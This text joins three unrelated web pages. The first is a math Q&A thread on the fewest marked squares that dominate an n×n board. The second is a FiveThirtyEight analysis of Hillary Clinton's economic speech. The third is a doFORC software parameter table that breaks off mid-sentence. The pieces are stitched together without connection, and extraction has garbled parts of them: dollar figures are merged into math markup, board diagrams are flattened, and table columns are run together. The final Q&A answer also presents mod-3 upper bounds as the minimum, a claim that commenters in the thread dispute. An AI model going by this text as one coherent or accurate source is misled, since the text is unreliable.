# Minimum number of marked squares on $n × n$ board Came across this question: Consider an $n × n$ square board, where $n$ is a fixed even positive integer. The board is divided into $n^2$ unit squares. We say that two different squares on the board are adjacent if they have a common side. $N$ unit squares on the board are marked in such a way that every square (marked or unmarked) on the board is adjacent to at least one marked square. Determine the smallest possible value of $N$. I've found an upper bound of $N = \frac {n^2}2$. But is this the smallest possible value of $N$? If so, how can I prove it? I've included an illustration of my upper bound for $n=2$ and $n=4$ below. Edit @jwsiegel has linked to the supposed solution here: http://www.cs.cornell.edu/~asdas/imo/imo/isoln/isoln993.html It gives the solution $$N = \frac{n(n+2)}{4}$$ I don't understand how this solution is correct. The instructions for marking squares is given as: 1. Color alternate squares black and white (like a chess board). 2. Look first at the odd-length white diagonals. In every other such diagonal, mark alternate squares (starting from the border each time, so that r+1 squares are marked in a diagonal length 2r+1). That's it. I have followed these instructions (as I understand them) for $n=4$ and $n=6$ below, using an X to indicate a marked square: The number of marked squares fits the given solution, i.e. $N = 6$ for $n = 4$ and $N = 12$ for $n = 6$, but NO marked square is adjacent to any other marked square! How then is this a valid solution? I can only see 3 possibilities: 1. I have marked incorrectly, or 2. The people who made this solution count a common corner as a common side between 2 squares, or 3. The solution is incorrect. • You are on to something! I can delete the first square, but not the third as that would leave the second square not adjacent to a marked square. But I can delete the fourth square. – Jens Apr 27, 2016 at 4:31 • The paper cited above would apply to the problem if we didn't require the marked squares to be adjacent to another marked square. Apr 27, 2016 at 4:41 • Aren't all squares self adjacent? So aren't marked squares vacuously adjacent to a marked square? Apr 27, 2016 at 4:46 • @ Juan Sebastian Lozano - The definition of "adjacent" only refers to "two different squares". – Jens Apr 27, 2016 at 4:49 • Oh, I see. That makes this problem harder, then. Apr 27, 2016 at 4:50 Consider an infinite checkerboard with squares labelled by pairs of integers and mark every square whose indices satisfy $$(i,j) \equiv (0,0) \pmod{4}$$ $$(i,j) \equiv (0,1) \pmod{4}$$ $$(i,j) \equiv (2,2) \pmod{4}$$ $$(i,j) \equiv (2,3) \pmod{4}$$ This provides a marking of the infinite board with the desired property such that every fourth square is marked. Thus we have that $$\lim_{n\rightarrow \infty} \frac{N}{n^2} = \frac{1}{4}$$ which is clearly the best possible asymptotic result. In fact the value of N is n(n+2)/4. The full solution can be found here. http://www.cs.cornell.edu/~asdas/imo/imo/isoln/isoln993.html • Does this work on an arbitrary finite board? I tried it on a $4n+1 \times 4n+1$ board and it didn't work, but maybe I tried it wrong. Apr 27, 2016 at 5:52 • I think any finite board will require some extra marked square around the boundary. It'll be O(n) additional squares, though. I'd be interested to know if there is a nice closed form expression for $N$. Apr 27, 2016 at 6:25 • I think there should be one for each case mod 4 (just like my answer below), but I don't know about generally. Apr 27, 2016 at 6:42 • Interesting! The question wasn't looking for an asymptotic result though, and I'm troubled by the fact that none of the boards marked using your marking scheme actually work, except for $n = 2$. How can you take a marking scheme which doesn't work for all $n$ and find a legitimate limit? – Jens Apr 27, 2016 at 17:02 • @Jens The problem portion of the board with this layout is the border, which consists of $4(n-1)$ squares. When $n$ is large, this number of squares is tiny relative to the total of $n^2$ squares. That's why, in the limit, you obtain the optimal result that one can cover the board by marking at most "just over" a quarter of the squares. Apr 27, 2016 at 19:49 jwsiegel has already provided both an asymptotic answer to the original question, and a link to a closed-form solution. I will address the Juan's question in the comments on jwsiegel's answer and Jens's follow-up question in the original post. In answer to Juan's question, "For even n, this is better, but does this work if n is odd?": Nothing in jwsiegel's asymptotic result makes any assumption on the parity of $n$. His answer provides a covering of the infinite plane which satisfies the rules given in the original post. When this marking is restricted to an $n \times n$ board, you get a marking of the board in which every interior square is adjacent to a marked board, with roughly a forth of the squares marked (exactly 1/4 if $n$ is a multiple of 4). To then cover the boundary as well, you need to add no more than $4(n-1)$ additional squares. When $n$ approaches infinity, this contribution becomes negligible, so we get that, for $n$ large, his covering of the board requires about a quarter of the squares to be marked. Since each square is adjacent to at most 4 other squares, it follows that this result is asymptotically optimal. It is, in principle, possible to precisely calculate how many squares are marked by this procedure, but there is no reason to expect that it will be optimal for any fixed $n$. What the asymptotic solution does do is provide guidance for what a closed-form solution must satisfy, namely, that $$\lim_{n \to \infty} \frac{N}{n^2} = \frac{1}{4}.$$ Now, for OP's question. You forgot this part: "In every other such diagonal..." With that in mind, here are the cases you wrote up, corrected. Let the upper-left hand corner be white, as in your pictures. I've indicated the black squares using an ascii box; hopefully that should make it pretty clear. $n=4$: X | ■ | | ■ --------------- ■ | | ■ | X --------------- | ■ | | ■ --------------- ■ | X | ■ | $n=6$: X | ■ | | ■ | X | ■ ----------------------- ■ | | ■ | | ■ | ----------------------- | ■ | X | ■ | | ■ ----------------------- ■ | | ■ | | ■ | X ----------------------- X | ■ | | ■ | | ■ ----------------------- ■ | | ■ | X | ■ | Observe that every black square is adjacent to exactly one marked white square. Now, as you observed, of course, no white square is adjacent to any marked square. But if we apply the exact same procedure to mark the black squares, then we obtain a marking of the entire board such that every square is adjacent to exactly one marked square. Then the claims are that (1) this board has $n(n+2)/4$ marked squares, and (2) this number of marked squares is optimal. Note that this closed form solution absolutely does depend on assuming that $n$ is even. – Jens May 1, 2016 at 23:26 • Glad to have helped! :) May 2, 2016 at 0:51 You can produce upper bounds for the three cases $n \equiv 1,2,3 \mod{3}$. In a $3n \times 3n$ square the upper bound is $3n^2$ because you can color every third row. In the case that it is a $(3n+1) \times (3n+1)$ square, then the upper bound is $3n^2+ n + 2*\lceil \frac{(3n + 1)}{4} \rceil$. This results from coloring every third row and adding a pair every two uncolored spaces on the last row. If it is a $(3n+2) \times (3n+2)$ board, the upper bound is $(3n+2)(n+1)$. This is what results from coloring every third row and the last row. All of these cases have the asymptotic ratio of colored squares to total squares of $\frac{1}{3}$, but also work on any finite board with a slightly higher ratio. • Nice! I'm trying to test if your numbers work but I'm having a little difficulty because you seem to have overlooked that $n$ must be even. Could you tell me what $N$ you get for $n = 10$? I can't find a solution less than 36. I think the equation of yours I should use here is the one with $(3n + 1)$ in it, giving 34. Correct? – Jens Apr 27, 2016 at 17:32 • That is true, I used general $n$. I fixed my bound on that case, it was incorrect because I made a wrong assumption about how I could divide up the last row. Apr 27, 2016 at 19:04 • Thanks! Would you mind spelling out the final answer (which I think you have found) so even I can immediately understand it? I.e. "Given n (a positive even integer), the smallest possible value of N divides into 3 cases as follows: (1) n mod 3 = 0; blah, blah (2) n mod 3 = 1; blah, blah (3) n mod 3 = 2: blah, blah ". If you post it as new Answer I will immediately upvote it (as I did your answer above). Thanks! – Jens Apr 27, 2016 at 20:40 • To downvoters: notice that these are upper bounds, I'm not claiming these are the best bounds. The best bound has already been produced, actually, and I would accept that answer instead. May 1, 2016 at 10:08 • Fair enough. It seems I'm not allowed to remove my downvote unless you edit this post, for some reason. If I had the option, I would remove this downvote, but not the one on your other answer, because there you do claim this value of $N$ is optimal. May 1, 2016 at 20:19 Given a square of size $n \times n$, where $n \in \mathbb{Z^+}$, the smallest value of shaded squares $N$ can be determined as one of these three cases: 1. If $n \equiv 3k \equiv 0 \mod 3$, then $N = 3k^2$ 2. If $n \equiv 3k +1 \equiv 1 \mod 3$, then $N= 3k^2 + k + 2*\lfloor\frac{3k+1}{4}\rfloor$ 3. If $n \equiv 3k +2 \equiv 2 \mod 3$, then $N= (3k+2)(k+1)$
2022-09-25 14:21:06
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 1, "mathjax_display_tex": 1, "mathjax_asciimath": 1, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.6176377534866333, "perplexity": 423.84938226441517}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030334579.46/warc/CC-MAIN-20220925132046-20220925162046-00527.warc.gz"}
http://fivethirtyeight.com/features/the-numbers-behind-hillary-clintons-economic-vision/
The Numbers Behind Hillary Clinton’s Economic Vision There was a single thread running through Hillary Clinton’s big economics speech on Monday: the importance of raising wages for working Americans. That’s no coincidence: The six-year-old economic recovery has succeeded in restoring corporate profits and creating jobs, but it hasn’t brought pay raises for many workers. Wage growth is running ahead of inflation, but it remains low and hasn’t accelerated as the economy as a whole has improved. And as Clinton stressed throughout her speech, many of those problems predate the recession, suggesting deeper structural challenges in the U.S. economy. “The defining economic challenge of our time is clear,” Clinton said in a speech at New York City’s New School. “We must raise incomes for hard-working Americans, so they can afford a middle-class life. We must drive steady income growth that lifts up families, and lifts up our country.” Clinton’s speech was light on specific proposals — those will arrive in coming weeks, according to her campaign — but it nonetheless represented one of the most comprehensive economic policy visions articulated to date by any of the major presidential candidates. Many of Clinton’s themes will sound familiar to anyone who’s been listening to President Obama over the past eight years. She wants to boost incomes for the middle class, raise taxes on the wealthy and make it easier for parents to juggle work and family. But she also highlighted issues that haven’t been as central to Obama’s message, such as encouraging companies to share more of their profits with workers. Clinton wasn’t shy about criticizing leading Republican candidates, calling out Jeb Bush, Scott Walker and Marco Rubio by name. Notably absent from her speech, however, was any reference to her opponents for the Democratic nomination, including Vermont Sen. Bernie Sanders and former Maryland Gov. Martin O’Malley. But Clinton’s focus on inequality and wages, along with her criticism of Wall Street and measured skepticism of free trade agreements, was no doubt partly intended to shore up support among the liberal wing of her party. Here are a few key passages from Clinton’s speech, along with some context and analysis. (Quotes are from a preliminary transcript.) Previous generations of Americans built the greatest economy and strongest middle class the world has ever known on the promise of a basic bargain: If you work hard and do your part, you should be able to get ahead. And when you get ahead, America gets ahead. But over the past several decades, that bargain has eroded. The core of Clinton’s message is that middle-class incomes have stagnated in recent years, not just during the recession and its aftermath but even during better economic times. That’s true, though the middle class’s struggles are sometimes exaggerated. The typical (median) U.S. household earned just less than $52,000 before taxes in 2013, the latest year for which full data is available. Adjusting for inflation, that’s less than in 1989, suggesting that the middle class has experienced two and a half decades of income stagnation. Reality isn’t quite that grim. The Census Bureau’s income statistics don’t account for the fact that the typical American household is smaller today than it was 25 years ago. That’s a big deal because a single person living on$50,000 has a much higher standard of living than a family of six trying to squeeze by on the same amount. Adjust for household size, and incomes are up significantly since the late 1980s. Even adjusting for household size, however, median income has been more or less stagnant since 2000. Some economists propose other adjustments to the census figures, such as using a different measure of inflation and looking at after-tax rather than pre-tax income. But while the exact figures are in dispute, the overall trend is not: Income growth has been far slower since 2000 than in the decades before. The measure of our success must be how much incomes rise for hard-working families, not just for successful CEOs and money managers and not just some arbitrary growth targets untethered to people’s lives and livelihoods. Clinton didn’t mention him by name until later in her speech, but there’s little doubt this line was intended as a shot at former Florida Gov. Jeb Bush, one of the leading candidates on the Republican side of the campaign. Bush has pledged to deliver a 4 percent annual growth rate, which he has argued is the best way to help the middle class. Clinton says economic growth alone doesn’t necessarily translate into more money for the middle class. There’s evidence to back that up: In recent decades, the share of national income that goes to workers has fallen while the share going to corporate profits has risen. Taken at face value, the numbers mean workers aren’t benefiting as much from economic growth as they used to. Some economists, however, have recently questioned whether workers’ piece of the economic pie has shrunk as much as the official figures show, though they don’t dispute that the so-called labor share fell significantly during the recession. Moreover, even if the long-term decline is real, it has been a global phenomenon, affecting virtually the entire developed world, including many countries with very different economic systems than the U.S.’s. That raises questions about whether Clinton — or any president — could do much to reverse the trend. It’s also worth noting that the one recent period when the labor share clearly rose was in the late 1990s, which was also the last time economic growth exceeded 4 percent for an extended period. That doesn’t guarantee a repeat performance, but it does hint that a period of particularly strong growth can have benefits for workers up and down the earnings spectrum. (The late 1990s were also, of course, the last time a president named Clinton was in office.) We also have to invest in our students and our teachers at every level, and in the coming weeks and months, I will lay out specific steps to improve our schools, make college truly affordable and help Americans refinance their student debt. This was nearly the only reference to college in Clinton’s speech, which might seem surprising given her focus on income: For decades, Democrats have stressed expanding access to college as a key way to reduce income inequality and expand the middle class. On an individual level, there’s little doubt that going to college remains the clearest pathway to a good job: The unemployment rate for college graduates was 2.5 percent in June, compared with 5.4 percent for those with only a high school diploma. The typical young bachelor’s degree holder in 2013 earned two-thirds more than the typical high school graduate, and one-third more than the typical worker with an associate degree, according to census data. But while a college education can clearly improve an individual’s job prospects, some economists — including many on the left — argue that education can’t do much to reduce inequality in the country as a whole. As more and more Americans go to college, the supply of college graduates has grown; more than 35 percent of Americans ages 25 to 34 now have at least a bachelor’s degree, up from less than 10 percent 30 years ago. That’s fine as long as employers keep needing more college-educated workers, but recent research suggests that demand for college graduates has leveled off or is even declining. Perhaps as a result, the college-wage premium — how much more college graduates earn than nongraduates — has stopped rising. The movement of women into the American workforce over the past 40 years was responsible for more than 3.5 trillion in economic growth. But that progress has stalled. Another major plank of Clinton’s economic plan is offering families, and working mothers in particular, family-friendly policies like paid parental leave. Compared with most wealthy nations, the U.S. offers workers less paid (and unpaid) parental leave. According to a 2008 analysis by the left-leaning Center for Economic and Policy Research, the U.S. ranks 20th out of 21 wealthy countries in offering two-parent families a combined 24 weeks of unpaid parental leave — and that is only for the 60 percent of workers covered through the Family and Medical Leave Act. Currently, only 12 percent of Americans get paid parental leave through their job, and predictably those benefits are more common for higher-income people. Clinton argued that in addition to promoting fairness, expanding paid parental leave can have serious economic benefits. One way these policies could affect the economy as a whole is by helping to reverse the troubling long-term decline in the share of the population that’s participating in the labor force. The so-called labor force participation rate — the share of the population that’s either working or actively looking for work — has been falling for years and stands at its lowest level since the late 1970s. The decline poses a major economic challenge because it leaves fewer workers to support the nonworking population. The drop has been particularly pronounced among men, whose participation rate has been falling for decades. But just as important has been the leveling off and then eventual decline in participation among women. Female labor force participation peaked at about 60 percent in 2000 and has been falling ever since. The U.S., which once had one of the highest female labor force participation rates in the world, according to data from the OECD, now ranks below Latvia, Estonia, Slovenia and a bunch of other countries. Liberal economists, including those on Clinton’s team, have long argued that the U.S. could help more women work if it offered more generous family benefits. Research estimates that the U.S.’s stingier parental leave policies explain about 30 percent of its relatively low female labor-force participation rate. Some states have already instituted family-friendly policies similar to those outlined in Clinton’s speech. California, Rhode Island and New Jersey fund insurance programs that provide four to six weeks of paid family care leave. Advocates for paid parental leave policies also cite other economic benefits, such as reduced employee turnover. Today’s marketplace focuses too much on the short-term, like second-to-second financial trading and quarterly earnings reports, and too little on long-term investments. Clinton sketched out several ideas for reforming corporate America. She advocated for profit-sharing policies, which offer workers an ownership piece in the company they work for, with the goal to boost worker productivity and to distribute the company’s stock gains more evenly. Clinton said “studies show that profit sharing that gives everyone a stake in the company’s success can boost productivity and put money directly into employees’ pockets.” In a speech later this week in New Hampshire, she will have more to say on this issue. Clinton also decried “quarterly capitalism,” or the short-termism of corporate America. Citing the declining rates of business investment in things like factories and research labs and the explosion of share buybacks and dividends, she pledged to better align corporate decisions for long-term growth. But she didn’t say how she would do that. Some potential policies can be found in a report published by the left-leaning (and Clinton-allied) Center for American Progress earlier this year. To encourage more long-term thinking by executives, the report proposed lengthening the time before executive stock options are fully vested, and limiting how many options executives can exercise. Clinton suggested other reforms that would affect corporate America, including the Buffett rule — named after billionaire Warren Buffett — that would institute a minimum tax of 30 percent on those making more than1 million a year. She also proposed closing the carried-interest loophole, which allows those who make a bulk of their income from capital gains (such as hedge fund managers) to pay a lower overall tax rate. Small businesses create more than 60 percent of new American jobs on net, so they have to be a top priority. I’ve said I want to be the small-business president, and I mean it. And throughout this campaign, I’m going to be talking about how we empower entrepreneurs with less red tape, easier access to capital, tax relief and simplification. Politicians love to talk about the importance of small businesses, but economic research has found that the real drivers of job growth aren’t small businesses but new businesses: Fast-growing startups account for a disproportionate share of hiring. New companies are also key sources of innovation and productivity gains. But entrepreneurship in the U.S. is in trouble. The rate at which Americans start new businesses has been falling for 30 years, a decline that cuts across industries and geographies. The trend may be surprising given the buzz around Uber, Airbnb and other high-profile Silicon Valley startups. But for all the talk of “disruption,” data from multiple sources suggests that the American economy has become more comfortable for big incumbent businesses and less hospitable to entrepreneurs. Clinton’s pledge to cut red tape and provide easier access to capital could just as easily have come from a speech from one of her Republican opponents. But the truth is economists aren’t sure what’s behind the decline in startups, which makes it hard to develop policies to combat it. Talent is universal; you find it everywhere. But opportunity is not. There are nearly 6 million young people aged 16 to 24 in America today who are not in school or at work. The numbers for young people of color are particularly staggering. A quarter of young black men and nearly 15 percent of all Latino youth cannot find a job. Clinton’s decision to highlight young people who are neither working nor in school is notable because it’s an economic measure that tends to get relatively little attention in the U.S. In Europe, the concept is so widely discussed that even mainstream news outlets routinely refer to “NEETs,” short for “not in employment, education or training.” In some European countries such as Greece and Italy, more than 30 percent of people ages 20 to 24 are NEETs. The problem isn’t nearly as severe in the U.S., but it is still significant. Nearly 19 percent of American 20- to 24-year-olds were neither working nor in school in 2013, according to OECD data. That’s little better than in the worst of the recession and is up from 15.5 percent in 2005. And as Clinton said, the numbers are far worse for many minority groups. OECD doesn’t break down its data by race, but according to data from the Bureau of Labor Statistics, 22 percent of black men ages 16 to 24 are neither in school nor working, compared with 16 percent of all Americans in that age group. Ben Casselman is a senior editor and the chief economics writer for FiveThirtyEight. Andrew Flowers is FiveThirtyEight’s quantitative editor.
2016-07-24 06:54:14
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 1, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.17469781637191772, "perplexity": 3321.0265679678814}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.3, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2016-30/segments/1469257823963.50/warc/CC-MAIN-20160723071023-00122-ip-10-185-27-174.ec2.internal.warc.gz"}
http://stoner.phys.uaic.ro/forc/doforc/doforc-parameters.html
doFORC Parameters ### Configuration file and keywords for doFORC Acronyms: $\mathcal{O}$ = Optional $\mathcal{M}$ = Mandatory N/A = Not Applicable Keyword$\mathcal{O}$ $\mathcal{M}$ TypeDefault value Accepted valuesDescription Input data input_file$\mathcal{M}$stringN/AN/A File containing the input data. • file name and/or its path may contain blank spaces • comments beginning with an exclamation point (!) are ignored • non-numeric lines are treated as blank lines • line terminator (the character or sequence of characters that marks the end of a line of text) can be CR (usually Macintosh files), LF (usually Unix files), or CRLF (usually Windows files). All lines in a given file must have the same terminator. • the different values (columns) in a line can be separated by spaces, tabs, commas, semicolons, or a combination of them input_file_format$\mathcal{M}$stringN/APMC, h_m, ha_hr_m, hr_ha_m file formatcolumn_1column_2column_3column_4 PMC$h_{\mathrm{applied}}$magnetic_momentuser weight (optional) h_m$h_{\mathrm{applied}}$magnetic_momentuser weight (optional) ha_hr_m$h_{\mathrm{applied}}$$h_{\mathrm{reversal}}magnetic_momentuser weight (optional) hr_ha_mh_{\mathrm{reversal}}$$h_{\mathrm{applied}}$magnetic_momentuser weight (optional) • lines with fewer columns are treated as blank lines • any additional columns are ignored • $\left( h_{\mathrm{applied}},h_{\mathrm{reversal}} \right)$ play the role of the independent variables $\left( x,y \right)$, also known as explanatory variables, input, predictor, regressor, feature, etc. • magnetic_moment plays the role of the dependent variable $f$, also known as output, outcome, response, etc. PMC • file can have any of the PMC / Lakeshore files formats • header lines are not mandatory • each FORC curve must be preceded by the drift field measurement and a blank line • each FORC must be followed by a blank (non-numeric) line • the first line from a FORC is the reversal point • the first FORC does not need to contain a single point h_m • similar with the PMC format, but without the drift field measurements • each FORC must be followed by a blank (non-numeric) line • the first line from a FORC is the reversal point ha_hr_m • the first three columns represent the $\left( x,y,z \right)$ Cartesian coordinates • blank and non-numeric lines are ignored hr_ha_m • the first three columns represent the $\left( x,y,z \right)$ Cartesian coordinates • blank and non-numeric lines are ignored drift_correction$\mathcal{O}$logicalfalsetrue false Only for PMC / Lakeshore format. uw$\mathcal{O}$logicalfalsetrue false User weights to give to individual observations in the sum of squared residuals that forms the local fitting criterion. falseNo user weight is provided. trueUser weights (nonnegative values) are provided as a 3rd (PMC and h_m data) or 4th (otherwise) column in input_file. If an observation's weight is zero or negative, the observation is ignored in analysis. atol$\mathcal{O}$real0.0atol ≥ 0 Remove points that are closer than some tolerance (duplicate or nearby points) from input_file. Only one of atol and rtol tolerance parameters can be used: • atol = absolute tolerance • rtol = tolerance relative to the size of the smallest $h_{\mathrm{applied}},h_{\mathrm{reversal}}$ interval Default value removes only the duplicate points. rtol$\mathcal{O}$real0rtol ≥ 0 fill_x-steps_gt$\mathcal{O}$real0 ≥ 0 Resample individual FORCs by filling gaps greater than 'fill_x-steps_gt' on each individual FORC [curves given by the points with the same $y$ ($h_{\mathrm{reversal}}$) coordinate], in the preprocessing step. This feature is useful in the case of missing data or of large gaps in the input data. A statistic regarding the values of the increment $dx$ on each individual curve and respectively of the increment $dy$ between curves is provided in the Command Prompt window. Default value = no filling merge_x-steps_lt$\mathcal{O}$real0 ≥ 0 Resample individual FORCs by merging the points that are separated by steps less than 'merge_x-steps_lt' on each individual FORC [curves given by the points with the same $y$ ($h_{\mathrm{reversal}}$) coordinate], in the preprocessing step. This feature is useful in the case of "very close" points in the input data. The merging procedure may return points that were not input points, and it can even have a "smoothing effect". The first point corresponding to the smallest value of the $x$ ($h_{\mathrm{applied}}$) coordinate on each individual FORC is not modified. Default value = no merging nn_iFORC$\mathcal{O}$integer0nn_iFORC = 0 nn_iFORC ≥ 2 Number of nearest neighbors used to smooth each individual FORC with respect to $h_{\mathrm{applied}}$, in the preprocessing step. Smoothing is performed with a local regression around each input point, the size of each neighborhood being chosen so that the neighborhood contains at most nn_iFORC+1 data points. The individually smoothed curves will be subsequently smoothed with respect to both $h_{\mathrm{applied}}$ and $h_{\mathrm{reversal}}$, in the processing step. Default vale = no smoothing. noncircularity$\mathcal{O}$real1.0 > 0 Scale factor for input data before smoothing process, in the preprocessing step: $\;\overline{y}=\dfrac{y}{\mathrm{noncircularity}}$ . Scale factor changes the shape of the neighborhood, considering the points lying on an ellipse centered at the given point to be equidistant from the given point, and it is useful when the variables have different scales. After smoothing all the data are transformed back to their original state. Default value = no scaling of the independent variables $\left( h_{\mathrm{applied}},h_{\mathrm{reversal}} \right) \equiv \left( x,y \right)$. standardize_data$\mathcal{O}$integer00,1,2,3,4 Standardize input data before smoothing process, in the preprocessing step: $\;\overline{x}=\dfrac{x-x_{\mathrm{mean}}}{\sigma _x}$, $\;\overline{y}=\dfrac{y-y_{\mathrm{mean}}}{\sigma _y}$, $\;\overline{z}=\dfrac{z}{\sigma_z}$, where $x_{\mathrm{mean}}$, $y_{\mathrm{mean}}$ are the Winsorized mean value of each variable, and $\sigma _x$, $\sigma _y$, $\sigma_z$ the Winsorized standard deviation of each variable. Winsorized mean and standard deviation are robust scale estimators in that extreme values of a variable are discarded (the smallest and largest 5% of the data) before estimating the data scaling. Standardization changes the shape of the neighborhood and it is useful when the variables have significantly different scales. After smoothing all the data are transformed back to their original state. 0 • no standardization, the data remain unchanged 1 • independent variables are divided (scaled) by the same scale factor = $\mathrm{max}\left( \sigma _x,\sigma _y\right)$ → does NOT change the shape of the neighborhood • dependent variable is NOT scaled 2 • independent variables are scaled by $\sigma _x$ and $\sigma _y$, respectively → DOES change the shape of the neighborhood • dependent variable is NOT scaled 3 • independent variables are scaled by the same scale factor = $\mathrm{max}\left( \sigma _x,\sigma _y\right)$ → DOES change the shape of the neighborhood • dependent variable is scaled by $\sigma _z$ → can affect the statistics 4 • independent variables are scaled by $\sigma _x$ and $\sigma _y$, respectively → DOES change the shape of the neighborhood • dependent variable is scaled by $\sigma _z$ → can affect the statistics curves_to_be_processed$\mathcal{O}$stringall • positive integers • $dy \geq 0$ • extend Curves (FORCs) to be processed in the processing step. The command has three optional subcommands (parts): • a list of the curves that will be processed given as a list of values, a loop construct start:end:increment where increment is optional (default increment is 1), as a combination of them, or as one of the keywords 'all','odd','even' • the minimum increment (step) dy between the curves selected according the first subcommand • the curves for which the value of the increment between them is smaller than dy will not be processed • the first two subcommands can restrain (if necessary) the cropped region defined by ha_in_min, ..., ha_min, ..., hc_min, ..., or x_min, ... • the cropped region can be extended to the maximum values allowed by the first two subcommands using the third subcommand • 'extend' or 'ext' For example, '10:30:2 dy=0.01 extend' will select from the curves 10, 12, ..., 28, 30 those curves for which the value of the increment between them is greater than 0.01, and will extend the cropped region to the maximum allowed values. Default value = all curves will be processed Output data output_points$\mathcal{O}$stringinput_pointsinput_points Output is provided in the input $\left( h_{\mathrm{applied}},h_{\mathrm{reversal}} \right) \equiv \left( x,y \right)$ points. This option is intended for both FORC diagrams (or other derivatives) calculation and for a general use, as the calculation is made at the points provided in the input file. ha_hr_regular_grid Output is provided in a regular grid with: • nha × nhr points • $\mathrm{ha\_min} \leq h \, _{\mathrm{applied}}^{\mathrm{grid}} \leq \mathrm{ha\_max}$ • $\mathrm{hr\_min} \leq h \, _{\mathrm{reversal}}^{\mathrm{grid}} \leq \mathrm{hr\_max}$ • ignore $h \, _{\mathrm{applied}}^{\mathrm{grid}} < h \, _{\mathrm{reversal}}^{\mathrm{grid}}$ points This option is intended for FORC diagrams (or other derivatives) calculation. hc_hu_regular_grid Output is provided in a regular grid with: • nhc × nhu points • $\mathrm{hc\_min} \leq h \, _{\mathrm{coercive}}^{\mathrm{grid}} \leq \mathrm{hc\_max}$ • $\mathrm{hu\_min} \leq h \, _{\mathrm{interaction}}^{\mathrm{grid}} \leq \mathrm{hu\_max}$ where $\left\{ \begin{array}{l}h _{\mathrm{coercive}}=\dfrac{h_{\mathrm{applied}}-h _{\mathrm{reversal}}}{2} \\ h\,_{\mathrm{interaction}}=\dfrac{h_{\mathrm{applied}}+h\,_{\mathrm{reversal}}}{2}\end{array}\right.$, $\left\{ \begin{array}{l}h_{\mathrm{applied}}=h _{\mathrm{interaction}}+h _{\mathrm{coercive}} \\ h _{\mathrm{reversal}}=h _{\mathrm{interaction}}-h _{\mathrm{coercive}}\end{array}\right.$ This option is intended for FORC diagrams (or other derivatives) calculation. rectangular_grid Output is provided in a regular rectangular grid with: • nx × ny points • $\mathrm{x\_min} \leq x^{\mathrm{grid}} \leq \mathrm{x\_max}$ • $\mathrm{y\_min} \leq y^{\mathrm{grid}} \leq \mathrm{y\_max}$ This option is intended for a general use. user_points Output is provided in the user defined points from user_output_points_file. This option is intended for both FORC diagrams (or other derivatives) calculation and for a general use, as the calculation is made at the points provided by the user. user_output_points$\mathcal{M}$stringN/AN/A Only for output_points = user_points. ha_in_min$\mathcal{O}$realN/A$\geq \min \left( h_{\mathrm{applied}}\right)$ Only for output_points = input_points. Crop input points, ignoring the points that are outside the domain: $\; \left[ \mathrm{ha\_in\_min},\,\mathrm{ha\_in\_max}\right] \times \left[ \mathrm{hr\_in\_min},\,\mathrm{hr\_in\_max}\right]$. In order to diminish the boundary effects (numerical artifacts), the processing is accomplished (if there are input points) on a larger domain: $\left[ \mathrm{ha\_in\_min-}\Delta h_{a},\,\mathrm{ha\_in\_max+}\Delta h_{a}\right] \times \left[ \mathrm{hr\_in\_min-}\Delta h_{r},\,\mathrm{hr\_in\_max+}\Delta h_{r}\right],$ where $\left\{ \begin{array}{l} \Delta h_{a}=0.1\left( \,\max \left( h_{\mathrm{applied}}\right) -\min \left( h_{\mathrm{applied}}\right) \right) \\ \Delta h_{r}=0.1\left( \,\max \left( h_{\mathrm{reversal}}\right) -\min \left( h_{\mathrm{reversal}}\right) \right) \end{array}\right.$ ha_in_max$\mathcal{O}$realN/A$\leq \max \left( h_{\mathrm{applied}}\right)$ hr_in_min$\mathcal{O}$realN/A$\geq \min \left( h_{\mathrm{reversal}}\right)$ hr_in_max$\mathcal{O}$realN/A$\leq \max \left( h_{\mathrm{reversal}}\right)$ nha$\mathcal{M}$integerN/Anha > 0 Only for output_points = ha_hr_regular_grid. In order to diminish the boundary effects (numerical artifacts), the processing is accomplished (if there are input points) on a larger domain: $\left[ \mathrm{ha\_min}-\Delta h_{a},\,\mathrm{ha\_max}+\Delta h_{a}\right] \times \left[ \mathrm{hr\_min}-\Delta h_{r},\,\mathrm{hr\_max}+\Delta h_{r}\right]$, where $\left\{ \begin{array}{l} \Delta h_{a}=0.1\left( \mathrm{ha\_max} - \mathrm{ha\_min} \right) \\ \Delta h_{r}=0.1\left( \mathrm{hr\_max} - \mathrm{hr\_min} \right) \end{array}\right.$. ha_min$\mathcal{M}$realN/A$\geq \min \left( h_{\mathrm{applied}}\right)$ ha_max$\mathcal{M}$realN/A$\leq \max \left( h_{\mathrm{applied}}\right)$ nhr$\mathcal{M}$integerN/Anhr > 0 hr_min$\mathcal{M}$realN/A$\geq \min \left( h_{\mathrm{reversal}}\right)$ hr_max$\mathcal{M}$realN/A$\leq \max \left( h_{\mathrm{reversal}}\right)$ nhc$\mathcal{M}$integerN/Anhc > 0 Only for output_points = hc_hu_regular_grid. In order to diminish the boundary effects (numerical artifacts), the processing is accomplished (if there are input points) on a 